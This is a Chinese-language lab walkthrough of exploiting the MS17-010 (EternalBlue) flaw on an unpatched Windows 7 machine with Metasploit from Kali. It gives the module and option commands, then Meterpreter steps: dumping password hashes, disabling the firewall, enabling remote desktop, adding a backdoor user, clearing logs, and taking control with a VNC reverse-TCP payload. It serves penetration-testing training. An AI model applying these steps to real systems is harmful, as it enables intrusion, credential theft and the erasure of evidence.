kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

2023年6月24日发(作者:)

kail利⽤msf⼯具对ms17-010(永恒之蓝)漏洞⼊侵渗透Win7kail利⽤msf⼯具对ms17-010(永恒之蓝)漏洞⼊侵渗透Win7前⾔:提到操作系统漏洞,⼤家肯定听说过⽿熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞⽣。该病毒是不法分⼦利⽤NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进⾏传播 。勒索病毒肆虐,俨然是⼀场全球性互联⽹灾难,给⼴⼤电脑⽤户造成了巨⼤损失。最新统计数据显⽰,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是⾃熊猫烧⾹以来影响⼒最⼤的病毒之⼀。实验环境:⼯具:metasploit靶机两台:windows 7sp1和kali2020攻击机IP地址:192.168.29.131被攻击机IP地址:192.168.29.128实验条件:两台机⼦可以互通的,并且windows 7sp1(⽆补丁)开启了445端⼝,防⽕墙是关闭的。

步骤:1、在kali⾥⾯打开metasploit漏洞利⽤框架2、搜索ms17-010漏洞利⽤模块 search 17-010找到exploit/windows/smb/ms17_010_eternalblue其中exploit具有攻击性,auxliary是⽤来验证的。3、使⽤利⽤模块use+exploit/windows/smb/ms17_010_eternalblue4、查看配置项 show options5、设置 靶机IP地址(RHOST),攻击机IP地址(LHOST)再次查看配置项6、实施攻击exploit/run7、攻⼊⽬标主机Meterpreter 是 Metasploit 的⼀个扩展模块,可以调⽤ Metasploit 的⼀些功能,对⽬标系统进⾏更深⼊的渗透,如获取屏幕、上传/下载⽂件、创建持久后门等。

在攻击进去的情况下演⽰⼏个功能1、查看⽬标主机的操作系统信息(sysinfo)2、对⽬标主机的屏幕进⾏截图(截图保存在/root下)3、查看⽬标主机所有的⽤户名和密码(密码显⽰为hash值)4、获取shell页⾯乱码解决⽅法:输⼊chcp 65001可将乱码解决5、关闭防⽕墙6、关闭Telnet服务7、⽤两种⽅法开启远程桌⾯服务,并查看远程桌⾯功能启⽤情况(1)⽅法1:run getgui -e(2)⽅法2:run post/windows/manage/enable_rdp到windows7sp1上查看远程桌⾯功能启⽤情况8、创建系统⽤户(创建⽤户名为:test,密码为:123456)9、清除⽇志

使⽤VNC payload远程操控⽬标电脑1,输⼊Background,返回退出meterpreter界⾯2,查看set payload 参数(输⼊set payload 按两下 TAB键 )找到windows/x64/vncinject/reverse_tcp,复制黏贴3,set payload windows/x64/vncinject/reverse_tcp4,set viewonly no5,exploit成功获取控制权

发布者:admin,转转请注明出处:http://www.yc00.com/news/1687580522a21875.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信